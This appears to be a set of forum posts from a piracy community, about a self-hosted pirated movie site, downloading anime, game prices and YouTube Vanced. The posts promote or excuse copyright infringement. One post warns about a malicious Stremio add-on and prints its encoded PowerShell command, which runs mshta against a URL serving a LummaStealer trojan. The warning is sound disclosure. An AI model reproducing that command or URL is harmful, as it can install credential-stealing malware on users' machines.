I made an open source, self hostable pirated movie streaming site with thousands of movies at the age of 14.
I made this site and hosted it with minimal ads that give all profit to the suppliers of the movie.
The site is completely open source, the github has a guide for self hosting and there are no ads apart from ones that I cant remove.
I made it at the age of 14 for a hackathon called Hack Club Arcade

Does downloading animes with jdownloader has a catch?
Hey, today i figured out, that i can just download animes when i copy the streaming link into JDownloader.
It kinda feels too easy.
Is there a catch? Is it not safe? Higher risk of getting malware?
I'm new to this whole pirating thing, so maybe it is really that easy and i'm just stupid :D

The price of games is unreasonable.
Any time I bring up the fact that $60 - $70 games is too much, I get the answer that "It's always been this way," but is that a good thing? In my opinion, no. I am Canadian, and paying for $100 games is not a reasonable, it gets even worse when AAA games like Elden Ring ($106.49 with DLC) Ends up being $122.43 with Quebec's tax. Don't you guys think this is crazy? Another example, Black Myth: Wukong: $114.96. These prices are insane! To put it into context, a $100 game is nearly a week's wage at my point, and I don't get to keep much money to myself afterwards. And people have the balls to say piracy is stealing or immoral, I literally cannot afford to buy games because companies decided that paying ludicrous prices should be normalized.

I Almost Got Hacked While Using Stremio – Beware of Malicious Add-ons!
Hey everyone,
I wanted to share a recent experience I had with Stremio, hoping it might save some of you from getting hacked. I was browsing the community add-ons in Stremio and saw the OpenSubtitles and Subscene add-ons. I thought they might come in handy for subtitles, so I decided to configure them.
The setup seemed easy – just follow the on-screen instructions. I selected the language for the subtitles, but when I tried to install the add-on, it prompted me to complete some sort of verification step. The instructions were simple:
1. Press Win + R
2. Press Ctrl + V
3. Click OK
I pressed Ctrl + V and was surprised to see the following code appear, even though I hadn’t copied anything myself:
"powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==" Don't excute it
This seemed strange, so I decided to investigate. When I scanned the code, I found that it was a PowerShell command with an encoded payload.
Here's what I found:
- `-eC`: This parameter tells PowerShell to execute a command that is provided in encoded form (Base64 encoded).
- The decoded command using Base64 is:
mshta "https://bidvertiser.b-cdn.net/smart1"
What This Command Does:
- mshta: Launches the Microsoft HTML Application Host, which can execute HTML applications (HTA files).
- "https://bidvertiser.b-cdn.net/smart1": This URL is opened by the command, which can potentially execute harmful code hosted on the page.
Downloading the file from this link gives you an `.exe` file named "DIALER.EXE". I scanned this file using VirusTotal, and it showed that 50 out of 57 antivirus engines detected it as Trojan.LummaStealer/Mikey.

This site, which is mentioned in the Megathread, is deceitful as it downloads Spotify songs in only 192 kbps but says that it does so in 320 kbps on its homepage itself! I think it should be removed from the Megathread as it can't be trusted & it can become risky in future endeavours!

So, YouTube decided to raise its Premium prices in the Philippines(idk about the others). Because clearly, what the world needs right now is another way to feel like we're getting less for more, right?
Honestly, I’m almost grateful for this price hike. It’s like YouTube Premium is doing its best to push us towards better options, and I couldn’t be happier about discovering Vanced thanks to this community. If YouTube’s idea of "premium" means more of our cash for fewer benefits, then I’m all in for skipping that party.
